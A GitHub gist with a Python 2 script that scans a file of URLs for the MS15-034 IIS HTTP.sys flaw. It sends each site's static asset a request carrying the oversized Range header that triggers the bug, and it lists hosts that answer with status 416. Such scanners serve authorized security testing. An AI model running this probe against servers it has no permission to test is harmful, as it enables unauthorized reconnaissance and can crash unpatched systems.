Created
July 8, 2016 10:13
-
-
Save milo2012/155efe72cdb0b9c29b452550396126f6 to your computer and use it in GitHub Desktop.
Test MS15-034 by using a list of URLS as input
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import optparse | |
import re | |
import requests | |
import sys | |
import lxml | |
import urllib2 | |
from lxml import html | |
from bs4 import BeautifulSoup | |
requests.packages.urllib3.disable_warnings() | |
class colors: | |
def __init__(self): | |
self.green = "\033[92m" | |
self.blue = "\033[94m" | |
self.bold = "\033[1m" | |
self.yellow = "\033[93m" | |
self.red = "\033[91m" | |
self.end = "\033[0m" | |
color = colors() | |
#Defining the main function. | |
def main(url): | |
print color.green+"[*] Testing "+color.end + url | |
try: | |
#Defining the Headers. | |
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0", | |
"Accept-Encoding": "gzip, deflate", | |
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", | |
"Range": "bytes=0-18446744073709551615", | |
"Referer": "https://github.com/zigoo0/", | |
"Connection": "keep-alive" | |
} | |
#Sending the Request. | |
r = requests.get(url, headers=headers, verify=False, timeout=5) | |
if r.status_code == 416 or "Requested Range Not Satisfiable" in r.text: | |
#print r.status_code. | |
print "[*] %s"%(url) + color.red+" is Vulnerable!\n"+color.end | |
#Adding the vulnerable hosts to a SET for later use and to make sure it's a unique host. | |
vulnerable.add(url) | |
else: | |
#print r.status_code | |
print "[*] Seems %s "%(url) + color.green+" is not vulnerable!\n"+color.end | |
#Adding the non-vulnerable hosts to a SET for later use. | |
fixed.add(url) | |
except Exception: | |
pass | |
def parsePage(url): | |
resultList=[] | |
try: | |
website = requests.get(url,verify=False) | |
html = website.text | |
pat = re.compile(r'<\s*img [^>]*src="([^"]+)') | |
img = pat.findall(html) | |
for x in img: | |
resultList.append(x) | |
pat = re.compile(r'<param [^>]*value="([^"]+)') | |
img = pat.findall(html) | |
img | |
for x in img: | |
if ".swf" in x: | |
resultList.append(x) | |
except requests.exceptions.ConnectTimeout: | |
pass | |
except requests.exceptions.SSLError: | |
pass | |
return resultList | |
if __name__ == "__main__": | |
parser = optparse.OptionParser() | |
parser.add_option('-f', action="store", dest="filename", help="file containing list of websites") | |
options, remainder = parser.parse_args() | |
if options.filename: | |
hosts=[] | |
print color.blue+"[*] Finding static objects on the webpages"+color.end | |
urlList = [line.strip() for line in open(options.filename, 'r')] | |
for url in urlList: | |
uriPathList=parsePage(url) | |
y="" | |
if len(uriPathList)>0: | |
y = url+"/"+uriPathList[0] | |
print y | |
hosts.append(y) | |
else: | |
print url | |
vulnerable = set() | |
fixed = set() | |
print "\n" | |
for host in hosts: | |
url = host.strip() | |
main(url) | |
print color.red+"[*] %s found to be vulnerable."%(len(vulnerable)) +color.end | |
for vuln in vulnerable: | |
print "[-] ", vuln |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment